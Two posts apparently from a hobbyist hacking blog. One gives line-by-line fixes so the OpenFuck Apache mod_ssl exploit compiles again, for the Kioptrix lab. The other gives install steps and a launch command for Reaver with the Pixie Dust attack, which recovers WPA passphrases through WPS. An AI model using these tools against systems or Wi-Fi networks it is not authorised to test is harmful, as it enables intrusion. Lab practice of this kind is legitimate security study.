Sunday, August 5, 2018

updating openfuck exploit if you are geting ssl error

Kioptrix level 1- Error while compiling openfuck exploit solved

Hello guys. I got error while compiling exploit openfuck, even i updated that exploit according to this blog http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. But still got ssl error like this screenshot.

I googled a bit to solve this error.follow the steps carefully.

Step 1- Update your exploit first according to this blog
http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/.

Step 2- Now add these lines at line no 24

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

Step 3- Replace if (pkey ->type != EVP_PKEY_RSA) from line 1078 with

if (EVP_PKEY_get1_RSA(pkey) == NULL).

Step 4-  Goto line no 1084 and replace pkey->pkey.rsa with  EVP_PKEY_get1_RSA(pkey)

Hope this can help you out if you got stuck with this exploit. Cheers !
Posted by at No comments:
Labels: , , , ,

Wednesday, December 21, 2016

Installation of modified Reaver with Pixie-dust

Hello Guys
Today i am going to show you "How to install modified Reaver which include Pixie Dust Attack"

About Reaver

Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a wide variety of access points and WPS implementations.
The original Reaver implements a online brute force attack against, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf. reaver-wps-fork-t6x is a community forked version, which has included various bug fixes and additional attack method (the offline Pixie Dust attack).
Depending on the target's Access Point (AP), to recover the plain text WPA/WPA2 passphrase the average amount of time for the transitional online brute force method is between 4-10 hours. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. When using the offline attack, if the AP is vulnerable, it may take only a matter of seconds to minutes.

 Installation

Step 1: Type on Terminal
"apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps"



Step 2: Go to this link "https://github.com/t6x/reaver-wps-fork-t6x"


 Step 3: Now type on Terminal "git clone https://github.com/t6x/reaver-wps-fork-t6x"

 Step 4: Type on Terminal"cd reaver-wps-fork-t6x/"

Step 5: Type on Terminal "cd src/"

Step 6: Type on Terminal "./configure"

Step 7: Type on Terminal "make"

Step 8: Type on Terminall "make install "






Thats all guys ;-) you are ready to launch reaver, to use pixiewps

Type "reaver -i (interface) -b (Bssid) -c (channel) -vvv K 1"

where  -i : interface of monitermode
           -b : Bssid
           -c : Current channel for Bssid
         -K 1: Launching Pixiewps   




 
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)